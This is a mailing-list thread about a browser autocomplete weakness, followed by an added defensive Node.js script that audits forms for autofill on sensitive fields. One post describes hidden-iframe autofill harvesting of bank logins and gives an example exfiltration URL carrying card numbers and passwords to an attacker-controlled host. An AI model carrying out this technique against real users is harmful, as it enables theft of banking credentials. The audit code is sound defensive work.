<input type="text" name="email" autocomplete="off">
Just realized that you would have to replace the text field in the
submission form if it has autocomplete="off", and by redrawing the form
get autocomplete to work its magic and have your JS go through the
testing process.
Anthony Pace wrote:
I was wondering if anyone here knew that this was possible and that,
according to some sources, this is one of the reasons it
wasn't implemented in Chrome:
I thought of this over two years ago; yet, never did anything with it
(lazy... really lazy... plus I am not a criminal).
Flash banners that inject JavaScript, XSS-exploited forms, or outright
malicious websites can place hidden iframes that load a bunch of
bank login sites and, using JavaScript, take advantage of auto complete
form fill functions that require no user interaction, by reading the
value of the input fields. Once you have the user's card# or login
and pass, you can dynamically create and load a script tag with the
src set to
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah
and you have sent the data to a remote location. If interaction is
required for the auto complete function to work, get JavaScript to
cycle through the ASCII and cycle focus back and forth from the field
till there is a value change.
The user would of course have signed up for a hotmail account, through a
proxy, and used that hotmail account to setup a geocities account. I
know this wouldn't get everyone; yet, if you put it on a linkshare
site, I am betting a hacker could just watch the collected info pour in.
I got it to work on my laptop for a locally hosted site, (on I won't
tell with what browser and what parameters) and I am thinking about
submitting a proof of concept; yet, I am wondering if anyone else
wrote about this first, if I just missed it, and if there is someone
else's proof of concept it would look like I was ripping off?
___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
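
Added example, not part of the original posts: a Node.js audit that lists credential-like inputs whose effective `autocomplete` setting is not `off`, taking the enclosing form's value as the default for its fields. The name patterns and sample markup are constructed for illustration; as the reply above points out, the attribute does not help once script in the page can replace the field.

```javascript
// Added example: audit markup for sensitive inputs that still allow autofill.
// Assumption: field-name hints below are illustrative, not a complete list.
const SENSITIVE = /pass|card|login|email|bank/i;

// Parse one tag's attributes into a lower-cased-name -> raw-value map.
function parseAttrs(tag) {
  const attrs = {};
  const body = tag.replace(/^<\/?[a-zA-Z]+/, "").replace(/\/?>$/, "");
  const re = /([a-zA-Z-]+)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] || m[3] || m[4] || "";
  }
  return attrs;
}

// Return [{name, type, effective}] for sensitive inputs where autofill is allowed.
function auditAutofill(html) {
  const findings = [];
  let formAuto = null; // autocomplete value of the enclosing <form>, if any
  const tagRe = /<(\/?)(form|input)\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    if (m[2].toLowerCase() === "form") {
      // A closing </form> clears the inherited default.
      formAuto = m[1] ? null : (parseAttrs(m[0]).autocomplete || "").toLowerCase() || null;
      continue;
    }
    const a = parseAttrs(m[0]);
    const type = (a.type || "text").toLowerCase();
    if (type === "hidden" || type === "submit") continue;
    if (type !== "password" && !SENSITIVE.test(a.name || "")) continue;
    // The field's own attribute wins; otherwise the form's; otherwise "on".
    const effective = (a.autocomplete || formAuto || "on").toLowerCase();
    if (effective !== "off") findings.push({ name: a.name || "(unnamed)", type, effective });
  }
  return findings;
}

// Constructed sample markup.
const SAMPLE = `<form action="/login" method="post">
  <input type="text" name="email" autocomplete="off">
  <input type="password" name="pass">
</form>
<form action="/pay" autocomplete="off">
  <input type="text" name="bankcard">
  <input type="text" name="cardholder" autocomplete="on">
  <input type="text" name="coupon">
</form>`;
console.log(auditAutofill(SAMPLE));
```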